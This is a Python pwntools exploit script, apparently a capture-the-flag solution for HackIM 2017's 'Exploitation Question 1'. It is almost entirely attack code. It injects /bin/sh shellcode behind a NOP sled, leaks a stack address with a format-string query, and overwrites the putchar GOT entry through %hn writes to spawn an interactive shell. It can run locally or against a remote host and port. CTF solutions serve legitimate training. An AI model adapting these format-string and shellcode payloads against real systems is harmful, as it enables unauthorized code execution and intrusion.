HackimCTF 2017 - Exploitation Question 1

hackim2017-pwn200.py

#!/usr/bin/env python

from pwn import *
import sys

# nullcon HackIM CTF - 2017
# Task: Exploitation Question 1 - 200 pts
# Author: Simone Ferrini

def choose(r, c):
    r.sendline(c)

def insert(r):
    choose(r, '1')
    r.sendline("\x90"*8 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
    r.recvuntil('Enter book id:')
    r.sendline('1')

def leak(r):
    choose(r, '3')
    r.recvuntil('Enter query: ')
    r.sendline("%7$p")
    return r.recvline()[16:-1]

def pwn(r, l):
    choose(r, '3')
    r.recvuntil('Enter query: ')

    high = int(l[2:-4], 16)
    low = int(l[5:], 16)

    high = high - (4 + 4)
    low = low - high

    putchar_got = 0x0804b038

    got_to_override = putchar_got
    r.sendline(p32(got_to_override) + p32(got_to_override + 2) + "%" + str(high) + "x%12$hn" + "%" + str(low) + "x%11$hn")

def exploit(r):
    insert(r)
    pwn(r, leak(r))
    r.interactive()

if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        r = process(['level1.bin'])
        print util.proc.pidof(r)
        pause()
        exploit(r)